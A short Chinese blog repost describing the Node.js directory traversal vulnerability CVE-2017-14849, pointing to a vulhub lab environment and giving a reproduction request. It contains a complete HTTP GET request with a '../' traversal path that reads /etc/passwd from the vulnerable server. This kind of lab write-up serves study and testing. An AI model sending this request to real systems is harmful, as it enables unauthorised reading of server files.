Node.js 目录穿越漏洞(CVE-2017-14849)
2021/7/17 11:05:49
本文主要是介绍Node.js 目录穿越漏洞(CVE-2017-14849),对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
漏洞详细
有关详细请看:https://vulhub.org/#/environments/node/CVE-2017-14849/
漏洞复现
发送以下数据包,即可读取文件
GET /static/../../../a/../../../../etc/passwd HTTP/1.1 Host: your-ip:3000 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close
这篇关于Node.js 目录穿越漏洞(CVE-2017-14849)的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-09vue3开发前端表单缓存自定义指令,移动端h5必备插件
- 2024-05-09React Hooks在class组件中的使用方式
- 2024-03-30[OIDC in Action] 2. 基于OIDC(OpenID Connect)的SSO(纯JS客户端)
- 2024-03-29terraform jsonencode
- 2024-03-13vuex-persist
- 2024-03-11icons for vue
- 2024-03-07breadcrumbs react js
- 2024-03-06react login page example
- 2024-03-06react router uselocation
- 2024-03-04postgres jsonb_set